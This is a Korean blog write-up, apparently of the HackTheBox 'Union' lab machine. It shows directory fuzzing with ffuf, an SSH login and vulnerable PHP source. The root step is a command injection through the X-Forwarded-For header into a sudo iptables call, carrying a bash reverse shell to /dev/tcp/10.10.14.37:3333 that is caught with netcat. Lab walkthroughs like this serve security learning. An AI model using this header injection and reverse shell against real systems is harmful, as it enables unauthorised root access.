1. User 시작!
Write-up 작성 시작분 부터 정리 ㅎㅎ
Nginx 웹루트 설정 파일이 저기 있군
ffuf 로 구한 config.php 파일 열기
하도 ffuf ffuf 해서 써봄 ㅋㅋㅋㅋㅋㅋ
┌──(root㉿P00075445-006)-[/home/surckers]
└─# ffuf -t 1000 -w directory-list-2.3-big.txt -u http://union.htb/FUZZ -e .php
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://union.htb/FUZZ
:: Wordlist : FUZZ: /home/surckers/directory-list-2.3-big.txt
:: Extensions : .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 1000
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ .php [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 302ms]
# Copyright 2007 James Fisher [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 303ms]
#.php [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 303ms]
# or send a letter to Creative Commons, 171 Second Street, .php [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 303ms]
# This work is licensed under the Creative Commons .php [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 303ms]
#.php [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 303ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 304ms]
# [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 304ms]
# on atleast 1 host [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 304ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 305ms]
#.php [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 305ms]
# Suite 300, San Francisco, California, 94105, USA..php [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 304ms]
# [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 309ms]
# Copyright 2007 James Fisher.php [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 310ms]
# on atleast 1 host.php [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 308ms]
# Priority ordered case sensative list, where entries were found .php [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 310ms]
# [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 310ms]
# Priority ordered case sensative list, where entries were found [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 310ms]
# directory-list-2.3-big.txt.php [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 310ms]
[Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 310ms]
index.php [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 310ms]
# Attribution-Share Alike 3.0 License. To view a copy of this .php [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 310ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 310ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 310ms]
# directory-list-2.3-big.txt [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 310ms]
# [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 315ms]
#.php [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 280ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 295ms]
css [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 286ms]
firewall.php [Status: 200, Size: 13, Words: 2, Lines: 1, Duration: 283ms]
config.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 282ms]
challenge.php [Status: 200, Size: 772, Words: 48, Lines: 21, Duration: 510ms]
[Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 279ms]
nginx 기본 설정 파일 탐색
web root 확인 후 php 파일들 확
SSH 접속 하면 끄읕. 일줄 알았는데 머냐? ㅋㅋㅋㅋㅋㅋㅋ 어의 없넹
ssh 왜 안붙노 아몰랑..
(06/26 User 부터 다시 ㅋㅋㅋㅋ)
기존 해논게 있어서 ssh 시도 (거봐 안될리가 없잔하~)
C:\Users\LGCNS>ssh 10.129.96.75
The authenticity of host '10.129.96.75 (10.129.96.75)' can't be established.
ED25519 key fingerprint is SHA256:hE6H4DrsHebfs+gclhz9SL77tMpy8aKR3vp8Y0NRDvY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.96.75' (ED25519) to the list of known hosts.
cns\mylife727@10.129.96.75's password:
Permission denied, please try again.
cns\mylife727@10.129.96.75's password:
C:\Users\LGCNS>ssh uhc@10.129.96.75
uhc@10.129.96.75's password:
Permission denied, please try again.
uhc@10.129.96.75's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-77-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Mon Nov 8 21:19:42 2021 from 10.10.14.8
uhc@union:~$
2. 권한상승 시작!
#challenge.php
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Jun 2024 15:30:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Set-Cookie: PHPSESSID=h1mk47rjmb664o45r21p5qbv3e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1083
Sorry, <?php
require('config.php');
if (!($_SESSION['Authenticated'])) {
echo "Access Denied";
exit;
}
?>
<link href="[//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css](https://maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css)" rel="stylesheet" id="bootstrap-css">
<script src="[//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js](https://maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js)"></script>
<script src="[//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js](https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js)"></script>
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - November Qualifiers</h1>
```
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
```
<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$ip = $_SERVER['REMOTE_ADDR'];
};
system("sudo /usr/sbin/iptables -A INPUT -s " . $ip . " -j ACCEPT");
?>
<h1 class="text-white">Welcome Back!</h1>
<h3 class="text-white">Your IP Address has now been granted SSH Access.</h3>
</div>
</section>
</div>
you are not eligible due to already qualifying.X-Forwarded-for 에 sudo 로 reverseshell 을 따보쟈~!
쌍따움표 때문에 괜히 붙였다가 고생 했음, ; 로 명령어를 분리 해준다
다들 아시죠,?
|| , &&, ; 메타 문자의 차이!일단 ping으로 테스트!
GET /firewall.php HTTP/1.1
Host: union.htb
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: ko-KR
Referer: http://union.htb/challenge.php
X-Forwarded-for: 1.1.1.1; sudo bash -c "sh -i >& /dev/tcp/10.10.14.37/3333 0>&1";
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=mf1og32c8ofgliaebqi4udcnmr
Connection: keep-aliveD:\pentestSW\netcat-win32-1.11\netcat-1.11>nc -lvnp 3333
listening on [any] 3333 ...
connect to [10.10.14.37] from (UNKNOWN) [10.129.96.75] 45730
sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/root.txt'Hacking > HackTheBox' 카테고리의 다른 글
| permx (Linux) (2) | 2024.07.23 |
|---|---|
| Jeeves (win) (1) | 2024.07.02 |
| pov (win) (0) | 2024.06.12 |
| solarlab (0) | 2024.05.29 |
| Giddy (0) | 2024.05.15 |
